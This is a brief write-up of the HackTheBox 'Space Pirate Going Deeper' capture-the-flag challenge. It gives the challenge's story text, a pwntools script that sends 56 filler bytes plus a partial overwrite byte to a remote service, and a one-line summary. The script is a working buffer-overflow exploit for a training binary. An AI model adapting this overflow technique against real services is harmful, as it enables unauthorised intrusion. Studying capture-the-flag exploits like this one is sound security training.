HackTheBox Space Pirate Going Deeper Challenge

2024-12-12[Updated: 2024-12-12]

https://app.hackthebox.com/challenges/330

Description

We are inside D12! We bypassed the scanning system, and now we are right in front of the Admin Panel. The problem is that there are some safety mechanisms enabled so that not everyone can access the admin panel and become the user right below Draeger. Only a few of his intergalactic team members have access there, and they are the mutants that Draeger trusts. Can you disable the mechanisms and take control of the Admin Panel?

Exploitation

#!/usr/bin/python3
from pwn import *

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

r = get_process()
r.recvrepeat(0.1)
r.sendline(b"1")
r.recvrepeat(0.1)
payload = b"A" * 56 + b"\x12"
r.sendline(payload)
r.interactive()

Summary

Space Pirate Going Deeper: build the exploit primitive, stabilize the payload, and use it to read the flag.